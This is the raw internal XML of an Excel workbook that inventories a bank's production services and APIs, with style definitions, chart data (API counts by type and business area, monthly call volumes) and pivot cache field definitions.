        <name val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="4" tint="0.5999938962981048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9" tint="0.39997558519241921"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="11"/>
        <color theme="1"/>
        <name val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </font>
      <fill>
        <patternFill patternType="none">
          <fgColor theme="9" tint="0.79998168889431442"/>
          <bgColor auto="1"/>
        </patternFill>
      </fill>
      <alignment horizontal="general"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3"/>
        <name val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="4" tint="0.59999389629810485"/>
        </patternFill>
      </fill>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fgColor indexed="64"/>
          <bgColor rgb="FFFFFF00"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <numFmt numFmtId="0" formatCode="General"/>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <fgColor indexed="64"/>
          <bgColor rgb="FFFFFF00"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FFFFFF00"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FFFFFF00"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <numFmt numFmtId="0" formatCode="General"/>
      <fill>
        <patternFill>
          <fgColor indexed="64"/>
          <bgColor rgb="FFFFFF00"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <numFmt numFmtId="0" formatCode="General"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="0" formatCode="General"/>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FFFFFF00"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="0" formatCode="General"/>
      <fill>
        <patternFill>
          <fgColor indexed="64"/>
          <bgColor rgb="FFFFFF00"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <fgColor indexed="64"/>
          <bgColor rgb="FFFFFF00"/>
        </patternFill>
      </fill>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <fgColor indexed="64"/>
          <bgColor rgb="FFFFFF00"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <numFmt numFmtId="164" formatCode="dd/mm/yyyy\ hh:mm"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="0" formatCode="General"/>
      <fill>
        <patternFill>
          <fgColor indexed="64"/>
          <bgColor rgb="FFFFFF00"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="11"/>
        <color theme="1" tint="0.14999847407452621"/>
        <name val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="4" tint="0.59999389629810485"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <border>
        <right style="medium">
          <color indexed="64"/>
        </right>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5" tint="0.59999389629810485"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <bgColor theme="5" tint="0.59999389629810485"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <border>
        <bottom style="medium">
          <color indexed="64"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border>
        <bottom style="medium">
          <color indexed="64"/>
        </bottom>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5" tint="0.59999389629810485"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <bgColor theme="5"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calcChain" Target="calcChain.xml"/><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[Inventario de Servicios y Apis Producción.xlsx]Graficos!TablaDinámica15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Cuenta de las APIs por Opcion Tipo</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:layout>
        <c:manualLayout>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="0.27761313819621808"/>
          <c:y val="0.1046440808731761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6"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </c:spPr>
      </c:pivotFmt>
      <c:pivotFmt>
        <c:idx val="10"/>
        <c:spPr>
          <a:solidFill>
            <a:schemeClr val="accent6"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </c:spPr>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pivotFmt>
      <c:pivotFmt>
        <c:idx val="14"/>
      </c:pivotFmt>
      <c:pivotFmt>
        <c:idx val="15"/>
      </c:pivotFmt>
      <c:pivotFmt>
        <c:idx val="16"/>
      </c:pivotFmt>
      <c:pivotFmt>
        <c:idx val="17"/>
      </c:pivotFmt>
      <c:pivotFmt>
        <c:idx val="18"/>
      </c:pivotFmt>
      <c:pivotFmt>
        <c:idx val="19"/>
      </c:pivotFmt>
      <c:pivotFmt>
        <c:idx val="20"/>
      </c:pivotFmt>
      <c:pivotFmt>
        <c:idx val="21"/>
      </c:pivotFmt>
    </c:pivotFmts>
    <c:plotArea>
      <c:layout>
        <c:manualLayout>
          <c:layoutTarget val="inner"/>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="0.30335714145820625"/>
          <c:y val="0.21020317713003905"/>
          <c:w val="0.31496684986518919"/>
          <c:h val="0.76367381826733494"/>
        </c:manualLayout>
      </c:layout>
      <c:doughnutChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>Graficos!$C$5</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Total</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:dPt>
            <c:idx val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000001-B5CF-412C-B410-4A2E8FDC9A3E}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000003-B5CF-412C-B410-4A2E8FDC9A3E}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="2"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000005-0AC9-429B-A3AB-9312E2A11A50}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="3"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000007-0AC9-429B-A3AB-9312E2A11A50}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="4"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="60000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000009-713A-47A6-B48D-3FC4ECA4B8DC}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="5"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="60000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{0000000B-713A-47A6-B48D-3FC4ECA4B8DC}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="6"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="80000"/>
                  <a:lumOff val="20000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{0000000D-713A-47A6-B48D-3FC4ECA4B8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Graficos!$B$6:$B$8</c:f>
              <c:strCache>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>API IBM Cloud </c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>API ONPREMISE</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Servicio</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Graficos!$C$6:$C$8</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>203</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>385</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>541</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000007-1BC2-4635-A6C8-F6E34B2E506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6241187213644057"/>
          <c:y val="0.30466647000537039"/>
          <c:w val="0.20112781852424208"/>
          <c:h val="0.270410855505806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[Inventario de Servicios y Apis Producción.xlsx]Graficos!TablaDinámica2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638598634290212"/>
          <c:y val="9.2470776518788808E-2"/>
          <c:w val="0.58011081948089827"/>
          <c:h val="0.83532872415338322"/>
        </c:manualLayout>
      </c:layout>
      <c:barChart>
        <c:barDir val="bar"/>
        <c:grouping val="clustered"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>Graficos!$C$29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Graficos!$B$30:$B$60</c:f>
              <c:strCache>
                <c:ptCount val="31"/>
                <c:pt idx="0">
                  <c:v>Autenticación y Monitoreo</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Baas-Depositos como Servicio</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Ciclo de Crédito</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Conocimiento de clientes</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>DATOS, ANALÍTICA, IA, BLOCKCHAIN</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Depósitos y cuentas especiales</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>Distribución Digital</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>ECOSISTEMAS</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>Evolución Digital</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>Financiación y consumo</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>Galatea</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>Gestión de flujos</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>Inclusión</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>Inmobiliario</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>Inversiones</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>Leasing</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>Medios de pago Aceptacion</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>Medios de pago Emision</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>Pymes y Empresas</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>Seguros</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>Servicios e Integració​​​​​​​​​​​​​​n</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>SUFI</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>Tesoreria</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>Transversal I-Series y No I-Series</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>Ventas Digitales y Tecnologias de Mercadeo</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>Otras Funciones de Apoyo</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>tu 360movilidad</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>Pricing</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>Por Definir</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>Distribución Fisica</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>Gestion integral del riesgo</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Graficos!$C$30:$C$60</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="31"/>
                <c:pt idx="0">
                  <c:v>86</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>6</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>26</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>51</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>53</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>76</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>46</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>27</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>41</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>168</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>96</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>37</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>9</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>36</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>22</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>47</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>49</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>8</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>9</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>59</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>8</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>30</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>19</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>8</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>4</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000001-E5D7-44E2-A932-6D7AE12F2BA6}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:dLblPos val="outEnd"/>
          <c:showLegendKey val="0"/>
          <c:showVal val="1"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="182"/>
        <c:axId val="665524159"/>
        <c:axId val="665523743"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="665524159"/>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523743"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="665523743"/>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524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[Inventario de Servicios y Apis Producción.xlsx]Graficos!TablaDinámica16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API CALL</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:layout>
        <c:manualLayout>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="0.46920620525547146"/>
          <c:y val="9.77550002998345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1"/>
      </c:pivotFmt>
      <c:pivotFmt>
        <c:idx val="2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8"/>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9"/>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024020894447"/>
          <c:y val="0.24642087979590477"/>
          <c:w val="0.75180113438722684"/>
          <c:h val="0.53727307040460626"/>
        </c:manualLayout>
      </c:layout>
      <c:lineChart>
        <c:grouping val="stacked"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>Graficos!$C$79:$C$80</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>gwe-loans-alm-pre-loan-query</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Graficos!$B$81:$B$85</c:f>
              <c:strCache>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>Mar</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Abr</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>May</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Jun</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Jul</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Graficos!$C$81:$C$85</c:f>
              <c:numCache>
                <c:formatCode>#,##0</c:formatCode>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>810083</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>841425</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>22365500</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>29405581</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>35310545</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-B166-4F50-9668-927691A13D50}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:dLblPos val="t"/>
          <c:showLegendKey val="0"/>
          <c:showVal val="1"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:smooth val="0"/>
        <c:axId val="34366639"/>
        <c:axId val="34342095"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="343666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O" b="1"/>
                  <a:t>MESES</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:layout>
            <c:manualLayout>
              <c:xMode val="edge"/>
              <c:yMode val="edge"/>
              <c:x val="0.48553930369598741"/>
              <c:y val="0.8705327119449592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42095"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="343420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O"/>
                  <a:t>  </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="es-CO" b="1"/>
                  <a:t>VALOR</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:layout>
            <c:manualLayout>
              <c:xMode val="edge"/>
              <c:yMode val="edge"/>
              <c:x val="4.3989828119734072E-2"/>
              <c:y val="0.4715960056673197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66639"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
      </c:valAx>
      <c:spPr>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </c:spPr>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:layout>
        <c:manualLayout>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="1.4189323610813237E-2"/>
          <c:y val="2.8168154353015312E-2"/>
          <c:w val="0.17425523732610346"/>
          <c:h val="7.13944452748318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142875</xdr:colOff>
      <xdr:row>3</xdr:row>
      <xdr:rowOff>9524</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>7</xdr:col>
      <xdr:colOff>1266825</xdr:colOff>
      <xdr:row>20</xdr:row>
      <xdr:rowOff>28574</xdr:rowOff>
    </xdr:to>
    <xdr:graphicFrame macro="">
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="2" name="Gráfico 1">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{363918B3-0E59-49FD-A599-5EDF9BA2F4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123825</xdr:colOff>
      <xdr:row>22</xdr:row>
      <xdr:rowOff>180975</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>7</xdr:col>
      <xdr:colOff>9525</xdr:colOff>
      <xdr:row>63</xdr:row>
      <xdr:rowOff>152400</xdr:rowOff>
    </xdr:to>
    <xdr:graphicFrame macro="">
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="3" name="Gráfico 2">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD31B478-90D7-4668-8982-8CDE448BD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66</xdr:row>
      <xdr:rowOff>185735</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>10</xdr:col>
      <xdr:colOff>9525</xdr:colOff>
      <xdr:row>96</xdr:row>
      <xdr:rowOff>57150</xdr:rowOff>
    </xdr:to>
    <xdr:graphicFrame macro="">
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="4" name="Gráfico 3">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7058173-A69E-4DDE-A8AF-0CE7737620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IA%20DIA\Gobierno%20WSRR\INFORME\Gobierno%20Produccion\Inventario%20de%20Servicios%20%20Completo%20Ver%201%20-%20cop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a"/>
    </sheetNames>
    <sheetDataSet>
      <sheetData sheetId="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Mario Duque Montoya" refreshedDate="44799.506634606485" createdVersion="6" refreshedVersion="6" minRefreshableVersion="3" recordCount="1129" xr:uid="{B70F6628-CE1C-40CD-AC01-44889DCC004C}">
  <cacheSource type="worksheet">
    <worksheetSource name="Consolidado"/>
  </cacheSource>
  <cacheFields count="23">
    <cacheField name="TIPO" numFmtId="0">
      <sharedItems count="3">
        <s v="Servicio"/>
        <s v="API ONPREMISE"/>
        <s v="API IBM Cloud "/>
      </sharedItems>
    </cacheField>
    <cacheField name="Fecha" numFmtId="22">
      <sharedItems containsNonDate="0" containsDate="1" containsString="0" containsBlank="1" minDate="2017-10-12T19:40:10" maxDate="2022-08-17T16:38:53"/>
    </cacheField>
    <cacheField name="Nombre Producto" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="Version Producto" numFmtId="0">
      <sharedItems containsBlank="1" containsMixedTypes="1" containsNumber="1" containsInteger="1" minValue="100" maxValue="1910"/>
    </cacheField>
    <cacheField name="NOMBRE DEL SERVICIO" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="VER" numFmtId="0">
      <sharedItems containsString="0" containsBlank="1" containsNumber="1" containsInteger="1" minValue="100" maxValue="1012"/>
    </cacheField>
    <cacheField name="Nombre Tecnico Api" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="DESCRIPCION" numFmtId="0">
      <sharedItems longText="1"/>
    </cacheField>
    <cacheField name="ÁREA - COMPONENTE MAYOR" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="COMPONENTE MENOR" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="EVC" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="Tipo Productor" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="Nombre Equipo" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="Nombre Dueño de Producto" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="SERVICIO PROVEEDOR" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="PROVEEDOR" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="CONSUMIDORES" numFmtId="0">
      <sharedItems longText="1"/>
    </cacheField>
    <cacheField name="Marzo" numFmtId="0">
      <sharedItems containsString="0" containsBlank="1" containsNumber="1" containsInteger="1" minValue="1" maxValue="49937577"/>
    </cacheField>
    <cacheField name="Abril" numFmtId="0">
      <sharedItems containsString="0" containsBlank="1" containsNumber="1" containsInteger="1" minValue="1" maxValue="87794372"/>
    </cacheField>
    <cacheField name="Mayo" numFmtId="0">
      <sharedItems containsString="0" containsBlank="1" containsNumber="1" containsInteger="1" minValue="1" maxValue="87155684"/>
    </cacheField>
    <cacheField name="Junio" numFmtId="0">
      <sharedItems containsString="0" containsBlank="1" containsNumber="1" containsInteger="1" minValue="1" maxValue="88695635"/>
    </cacheField>
    <cacheField name="Julio" numFmtId="0">
      <sharedItems containsString="0" containsBlank="1" containsNumber="1" containsInteger="1" minValue="1" maxValue="103033730"/>
    </cacheField>
    <cacheField name="Opcion Tipo" numFmtId="0">
      <sharedItems containsBlank="1" count="10">
        <s v="Servicio"/>
        <s v="API ONPMS INT"/>
        <s v="API Pro FE"/>
        <s v="API TEC"/>
        <s v="API ONPMS EXT"/>
        <s v="API Pro"/>
        <s v="API GWE"/>
        <s v="Servicio MDP"/>
        <m u="1"/>
        <s v="MDP" u="1"/>
      </sharedItems>
    </cacheField>
  </cacheFields>
  <extLst>
    <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{725AE2AE-9491-48be-B2B4-4EB974FC3084}">
      <x14:pivotCacheDefinition pivotCacheId="163820052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Mario Duque Montoya" refreshedDate="44799.506690162038" createdVersion="6" refreshedVersion="6" minRefreshableVersion="3" recordCount="1129" xr:uid="{A31BA924-E831-44CF-90FA-7593EDB52687}">
  <cacheSource type="worksheet">
    <worksheetSource name="Consolidado"/>
  </cacheSource>
  <cacheFields count="23">
    <cacheField name="TIPO" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="Fecha" numFmtId="22">
      <sharedItems containsNonDate="0" containsDate="1" containsString="0" containsBlank="1" minDate="2017-10-12T19:40:10" maxDate="2022-08-17T16:38:53"/>
    </cacheField>
    <cacheField name="Nombre Producto" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="Version Producto" numFmtId="0">
      <sharedItems containsBlank="1" containsMixedTypes="1" containsNumber="1" containsInteger="1" minValue="100" maxValue="1910"/>
    </cacheField>
    <cacheField name="NOMBRE DEL SERVICIO" numFmtId="0">
